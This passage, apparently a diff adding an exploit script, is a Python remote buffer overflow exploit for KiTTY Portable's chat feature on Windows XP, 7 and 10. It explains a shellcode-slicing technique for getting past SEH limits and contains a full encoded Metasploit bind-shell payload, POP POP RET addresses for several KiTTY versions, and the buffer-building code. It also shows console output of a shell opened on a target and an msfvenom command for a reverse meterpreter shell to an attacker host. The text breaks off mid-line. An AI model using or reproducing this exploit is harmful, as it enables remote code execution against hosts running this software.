+small shellcode such as windows/shell/reverse_ord_tcp (118 bytes encoded) makes KiTTY crashing after the first connection.
+We control the SEH overflow, but as all DLLs are SafeSEH protected, using an address from KiTTY itself has a NULL which
+forces us to jump backward with no extra space. We are jailed in a tight environment with little room to work with.
+
+The trick here is to slice our wanted Metasploit bind shellcode in 3 parts (350 bytes total), and send them in 3
+successive buffers, each of them waiting in an infinite loop to not crash the process. Each buffer payload will copy
+its shellcode slice to a stable memory location which has enough room to place a bigger shellcode. The final buffer
+jumps to that destination memory location where our whole shellcode has been merged, to then proceed with decoding
+and execution. This exploit is generic, which means you can even swap the shellcode included with a 850 bytes one,
+and it will be sliced in as many buffers as necessary. This method should theoretically be usable for other
+exploits and vulnerabilities as well.
+
+All KiTTY versions prior to 0.65.0.2p should be vulnerable, the only change is the SEH address for the POP POP RET.
+I have successfully exploited prior versions 0.63.2.2p and 0.62.1.2p using SEH addresses I have included as comment in the exploit.
+
+Pro & Cons:
+-----------
+[+]: works from XP to Windows 10 as it uses addresses from the main executable
+[+]: not affected by system DEP/ASLR/SafeSEH as the main executable is not protected
+[+]: works even with small slice size below 50 bytes, instead of 118
+[-]: each buffer sent consumes 100% of one CPU core. Sending many buffers can reach 100% of whole CPU depending on the
+CPU's core number. However even on a single core CPU, it is possible to send 9 buffers and run a shellcode successfully.
+Also, for a bind shell payload, the connection is kept open even when closing the main program.
+[-]: the destination memory address is derived from address of ECX at time of crash. To reuse this slice method on another
+vulnerability, it may be required to use another register, or even to use addresses available on stack instead at time of crash.
+
+Graphical explanation:
+---------------------
+
+-------------------
+-------------------
+---- SHELLCODE ----
+-------------------
+-------------------
+
+1) Shellcode Slicer -> slice[1]
+ -> slice[2]
+ -> slice[3]
+
+2) Buffer Builder -> buffer[1]: junk + padding + slice[1] + endmark + shell_copy + nseh + seh
+ -> buffer[2]: junk + padding + slice[2] + endmark + shell_copy + nseh + seh
+ -> buffer[3]: junk + padding + slice[3] + endmark + shell_copy + nseh + seh
+
+ TARGET CRASH AREA TARGET DST ADDR
+ ----------------------- shell_copy --------------
+3) Slice Launcher -> Sends buffer[1] ------------------------>| buffer[1] (thread1) | -----> | slice[1] | <-|
+ -> Sends buffer[2] ------------------------>| buffer[2] (thread2) | -----> | slice[2] | |
+ -> Sends buffer[3] ------------------------>| buffer[3] (thread3) | -----> | slice[3] | |
+ ----------------------- -------------- |
+ | |
+ |____________________________________|
+ jump to rebuilt shellcode
+
+guillaume@kali64:~$ ./kitty_chat.py 10.0.0.52 win10
+
+KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)
+[*] Connecting to 10.0.0.52
+[*] Sending evil buffer1... (slice 1/3)
+[*] Sending evil buffer2... (slice 2/3)
+[*] Sending evil buffer3... (slice 3/3)
+
+[*] Connecting to our shell...
+(UNKNOWN) [10.0.0.52] 4444 (?) open
+Microsoft Windows [version 10.0.10240]
+(c) 2015 Microsoft Corporation. Tous droits reserves.
+
+C:\kitty\App\KiTTY>
+
+"""
+
+import socket, os, time, sys, struct
+
+print "\nKiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)"
+
+if len(sys.argv) < 3:
+ print "\nUsage: kitty_chat.py [no_nc|local_nc]"
+ print "Example: kitty_chat.py 192.168.135.130 win7"
+ print "\n Optional argument:"
+ print "- 'no_nc' (no netcat), prevents the exploit from starting netcat."
+ print "Useful if you are using your own shellcode."
+ print "- 'local_nc (local netcat), binds netcat on local port 4444."
+ print "Useful if you are using a classic reverse shell shellcode."
+ sys.exit()
+
+host = sys.argv[1] # Remote target
+win = sys.argv[2] # OS
+
+# If argument "no_nc" specified, do not start netcat at the end of the exploit
+# If argument "local_nc" specified, bind netcat to local port 4444
+# By default netcat will connect to remote host on port 4444 (default shellcode is a bind shell)
+netcat = "remote"
+if len(sys.argv) == 4:
+ if sys.argv[3] == "no_nc":
+ netcat = "disabled"
+ elif sys.argv[3] == "local_nc":
+ netcat = "local"
+ else:
+ print "Unknown argument: %s" % sys.argv[3]
+ sys.exit()
+
+# Destination address, will be used to calculate dst addr copy from ECX + 0x0006EEC6
+relative_jump = 0x112910E8 # = 0x0006EEC6 + 0x11222222 ; avoid NULLs
+slice_size = 118
+
+# OS buffer alignement
+# buffer length written to memory at time of crash
+if win == "win7":
+ offset = 180
+elif win == "win10":
+ offset = 196
+elif win == "winxp":
+ offset = 160
+ slice_size = 98 # buffer smaller on XP, slice size must be reduced
+else:
+ print "Unknown OS selected: %s" % win
+ print "Please choose 'winxp', 'win7' or 'win10'"
+ sys.exit()
+
+# Shellcode choice: below is a Metasploit bind shell of 350 bytes. However I have tested successfully
+# a Metasploit meterpreter reverse RC4 shell of 850 bytes (encoded with x86/alpha_mixed) on Windows XP where the buffer
+# is the smallest. The shellcode was cut into 9 slices and worked perfectly :-) The same works of course
+# for Windows 7 and Windows 10, where I tested successfully a Metasploit HTTPS reverse shell of 1178 bytes
+# (encoded with x86/alpha_mixed), which was cut into 10 slices. To generate such shellcode:
+# msfvenom -p windows/meterpreter/reverse_https LHOST=YOUR_ATTACKER_IP LPORT=4444 -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' -f c
+
+# Metasploit Bind Shell 4444
+# Encoder: x86/fnstenv_mov
+# Bad chars: '\x00\x0a\x0d\xff'
+# Size: 350 bytes
+shellcode = (
+"\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e\xf9"
+"\xa7\x68\x83\xeb\xfc\xe2\xf4\xf2\x11\x25\x68\x0e\xf9\xc7\xe1"
+"\xeb\xc8\x67\x0c\x85\xa9\x97\xe3\x5c\xf5\x2c\x3a\x1a\x72\xd5"
+"\x40\x01\x4e\xed\x4e\x3f\x06\x0b\x54\x6f\x85\xa5\x44\x2e\x38"
+"\x68\x65\x0f\x3e\x45\x9a\x5c\xae\x2c\x3a\x1e\x72\xed\x54\x85"
+"\xb5\xb6\x10\xed\xb1\xa6\xb9\x5f\x72\xfe\x48\x0f\x2a\x2c\x21"
+"\x16\x1a\x9d\x21\x85\xcd\x2c\x69\xd8\xc8\x58\xc4\xcf\x36\xaa"
+"\x69\xc9\xc1\x47\x1d\xf8\xfa\xda\x90\x35\x84\x83\x1d\xea\xa1"
+"\x2c\x30\x2a\xf8\x74\x0e\x85\xf5\xec\xe3\x56\xe5\xa6\xbb\x85"
+"\xfd\x2c\x69\xde\x70\xe3\x4c\x2a\xa2\xfc\x09\x57\xa3\xf6\x97"
+"\xee\xa6\xf8\x32\x85\xeb\x4c\xe5\x53\x91\x94\x5a\x0e\xf9\xcf"
+"\x1f\x7d\xcb\xf8\x3c\x66\xb5\xd0\x4e\x09\x06\x72\xd0\x9e\xf8"
+"\xa7\x68\x27\x3d\xf3\x38\x66\xd0\x27\x03\x0e\x06\x72\x02\x06"
+"\xa0\xf7\x8a\xf3\xb9\xf7\x28\x5e\x91\x4d\x67\xd1\x19\x58\xbd"
+"\x99\x91\xa5\x68\x1f\xa5\x2e\x8e\x64\xe9\xf1\x3f\x66\x3b\x7c"
+"\x5f\x69\x06\x72\x3f\x66\x4e\x4e\x50\xf1\x06\x72\x3f\x66\x8d"
+"\x4b\x53\xef\x06\x72\x3f\x99\x91\xd2\x06\x43\x98\x58\xbd\x66"
+"\x9a\xca\x0c\x0e\x70\x44\x3f\x59\xae\x96\x9e\x64\xeb\xfe\x3e"
+"\xec\x04\xc1\xaf\x4a\xdd\x9b\x69\x0f\x74\xe3\x4c\x1e\x3f\xa7"
+"\x2c\x5a\xa9\xf1\x3e\x58\xbf\xf1\x26\x58\xaf\xf4\x3e\x66\x80"
+"\x6b\x57\x88\x06\x72\xe1\xee\xb7\xf1\x2e\xf1\xc9\xcf\x60\x89"
+"\xe4\xc7\x97\xdb\x42\x57\xdd\xac\xaf\xcf\xce\x9b\x44\x3a\x97"
+"\xdb\xc5\xa1\x14\x04\x79\x5c\x88\x7b\xfc\x1c\x2f\x1d\x8b\xc8"
+"\x02\x0e\xaa\x58\xbd"
+)
+# ###############################################################################
+# ** Shellcode Slicer **
+# ###############################################################################
+# Slice our shellcode in as many parts as necessary
+count = 1
+position = 0
+remaining = len(shellcode)
+slice = []
+total_size = 0
+
+counter = 0
+while position < len(shellcode):
+ if remaining > (slice_size - 1):
+ slice.append(shellcode[position:slice_size*count])
+ position = slice_size * count
+ remaining = len(shellcode) - position
+ count += 1
+ else: # last slice
+ slice.append(shellcode[position:position+remaining] + '\x90' * (slice_size - remaining))
+ position = len(shellcode)
+ remaining = 0
+
+ # If shellcode size is less than 256 bytes (\xFF), two slices only are required. However the jump
+ # to shellcode being on 2 bytes, it would insert a NULL (e.g \xFE\x00). In this case we simply
+ # add a NOP slice to keep this shellcode slicer generic.
+ if len(shellcode) < 256:
+ slice.append('\x90' * slice_size)
+ total_size += slice_size
+
+ # Keep track of whole slices size, which may be greater than original shellcode size
+ # if padding is needed for the last slice. Will be used to calculate a jump size later
+ total_size += len(slice[counter])
+
+
+# ###############################################################################
+# ** Buffer Builder **
+# ###############################################################################
+# Prepare as many buffers as we have shellcode slices
+seh = '\x36\x31\x4B\x00' # 0x004B3136 / POP POP RET / kitty_portable.exe 0.65.0.2p
+#seh = '\x43\x82\x4B\x00' # 0x004B8243 / POP POP RET / kitty_portable.exe 0.63.2.2p
+#seh = '\x0B\x34\x49\x00' # 0x0049340B / POP POP RET / kitty_portable.exe 0.62.1.2p
+nseh = '\x90' * 4 # will be calculated later
+junk = '\x41' * 58
+endmark = '\x43' * 5 # used to mark end of slice
+buffer = []
+
+for index in range(len(slice)):
+ # Slice end marker, to stop copy once reached # mov edi,0x4343XXXX
+ shellcode_end = '\xBF' + slice[index][slice_size-2:slice_size] + '\x43\x43'
+
+ shell_copy = ( # 51 bytes
+ # Calculate shellcode src & dst address
+ '\x8B\x5C\x24\x08' # mov ebx,[esp+8] ; retrieve nseh address
+ )
+
+ if index < (len(slice) - 1):
+ # sub bl,0xB2 ; calculate shellcode position from nseh
+ shell_copy += '\x80\xEB' + struct.pack(" 0: # add esi,0x1117FED7 (+118 * x)
+ shell_copy += '\x81\xC6' + struct.pack("